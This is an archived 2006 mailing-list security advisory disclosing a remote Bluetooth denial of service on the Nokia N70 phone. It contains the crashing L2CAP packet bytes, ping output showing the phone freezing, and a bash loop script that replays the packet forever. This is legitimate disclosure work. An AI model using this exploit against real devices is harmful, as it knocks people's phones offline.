lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <43F2EE0B.2050704@infratech.fr>
Date: Wed, 15 Feb 2006 10:02:03 +0100
From: Infratech Research <research@...ratech.fr>
To: bugtraq@...urityfocus.com
Cc: full-disclosure@...ts.grok.org.uk, vulnwatch@...nwatch.org
Subject: [ Secuobs - Advisory ] Another kind of DoS on
	Nokia cell phones


[Software affected] Bluetooth Stack on Nokia cell phones

[Version] Nokia N70 and maybe other models

[Impact] Remote Denial of Service, cellular phones begin to be slower and then freeze after a short period (within 30 seconds).

[Credits] Pierre Betouin - pierre.betouin@...ratech.fr -  Bug found with BSS new release v0.8 GPL fuzzer (Bluetooh Stack Smasher - Linux) 

BSS could be downloaded on  http://www.secuobs.com/news/15022006-bss_0_8.shtml

[Vendor] notified now

[Original advisory]

http://www.secuobs.com/news/15022006-nokia_n70.shtml#english
http://www.secuobs.com/news/15022006-nokia_n70.shtml#french

[Concept]

L2CAP packets responsible of the crash are :

7D AF 00 00 41 41 41

Where:

Code field 0x7D (1 byte)
Ident field 0xAF (1 byte)
Length field 0x0000 (2 bytes)

0x41 bytes are random padding.


[Proof of Concept]

# l2ping -c 3 00:15:A0:XX:XX:XX

Ping: 00:15:A0:XX:XX:XX from 00:20:E0:75:83:DA (data size 44) ...

0 bytes from 00:15:A0:XX:XX:XX id 0 time 64.18ms

0 bytes from 00:15:A0:XX:XX:XX id 1 time 43.94ms

0 bytes from 00:15:A0:XX:XX:XX id 2 time 37.25ms

3 sent, 3 received, 0% loss

# ./loop.sh 00:15:A0:XX:XX:XX

 (.. snip ..)

# l2ping -c 1 00:15:A0:XX:XX:XX

Ping: 00:15:A0:XX:XX:XX from 00:20:E0:75:83:DA (data size 248) ...

no response from 00:15:A0:XX:XX:XX id 0

1 sent, 0 received, 100% loss 


[replay_l2cap_packet_nokiaN70.c] could be downloaded on http://www.secuobs.com/replay_l2cap_packet_nokiaN70.c

[Loop.sh] as follows : 

#!/bin/bash

# Another Nokia N70 Bluetooth remote Denial of Service

# Pierre BETOUIN pierre.betouin@...ratech.fr

# Feb 14 11:21:58 GMT+1 2006

echo "Another Nokia N70 Bluetooth remote Denial of Service"

echo "Pierre BETOUIN pierre.betouin@...ratech.fr"

echo ""

if (( $# < 1 )); then

        echo "Usage: $0  (uses replay_l2cap_packet_nokiaN70)"

        exit

fi

if [ -x ./replay_l2cap_packet_nokiaN70 ]; then

        echo "Kill this prog with \"killall -9 loop.sh\" in another terminal."

        echo "PRESS ENTER TO LAUNCH THE DoS (or Ctrl-c to exit now)"

        echo ""

        read

        while (( 1 )); do       # Infinite loop, a bit dirty, we must say ;)

                ./replay_l2cap_packet_nokiaN70 $1

        done

else

        echo "You must compile replay_l2cap_packet_nokiaN70 before"

        echo "gcc -lbluetooth -o replay_l2cap_packet_nokiaN70 replay_l2cap_packet_nokiaN70.c"

        exit

fi

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ